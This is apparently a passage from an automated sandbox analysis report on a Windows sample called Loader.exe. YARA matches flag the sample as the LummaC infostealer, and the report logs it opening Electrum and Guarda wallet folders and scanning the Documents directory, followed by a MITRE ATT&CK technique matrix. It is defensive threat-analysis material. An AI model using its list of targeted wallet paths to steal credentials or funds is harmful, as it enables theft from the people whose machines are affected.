                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000002.00000003.1587677507.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1620380906.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1620222186.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1587467310.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 7788, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 7788, type: MEMORYSTR
                Source: Yara matchFile source: 2.2.Loader.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Loader.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2665491875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		211
                Process Injection                		22
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		211
                Process Injection                		LSASS Memory241
                Security Software Discovery                		Remote Desktop Protocol41
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager22
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information                		NTDS1
                Process Discovery                		Distributed Component Object ModelInput Capture14
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Software Packing                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials21
                File and Directory Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.